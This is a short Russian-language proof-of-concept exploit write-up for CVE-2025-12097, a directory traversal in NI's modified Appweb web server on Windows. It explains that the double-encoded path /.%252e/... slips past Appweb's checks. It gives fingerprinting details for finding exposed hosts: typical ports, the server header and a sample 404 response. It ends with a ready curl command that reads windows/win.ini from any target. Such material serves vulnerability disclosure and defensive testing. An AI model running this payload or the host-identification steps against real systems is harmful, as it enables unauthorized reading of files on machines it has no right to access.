
Эксплойт для проверки концепции уязвимости CVE-2025-12097, обход каталогов в модифицированном сервере Appweb от NI, позволяющая произвольное чтение файлов на системах Windows.
Модификация NI веб-сервера Appweb содержит уязвимость обхода каталогов, которая позволяет злоумышленнику читать произвольные файлы на сервере.
Путь URI /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini будет преобразован в:
pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808 что является допустимым URI, и Appweb не блокирует этот запрос. Затем он передается пользовательскому обработчику, который в данном случае возвращает содержимое любого запрошенного файла.
Из-за природы затронутого программного обеспечения уязвимыми устройствами являются исключительно системы Microsoft Windows.
Наибольшая наблюдаемая уязвимая версия: 12.0.0.
Уязвимые устройства можно идентифицировать по следующим характеристикам:
Не всегда, но в большинстве случаев служба работает на порту 3580, другие порты могут включать 8080 и 80.
Ответ сервера на /
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126
<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>
Для эксплуатации этой уязвимости вы можете использовать следующую команду:
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
Если цель уязвима, вы увидите содержимое файла win.ini.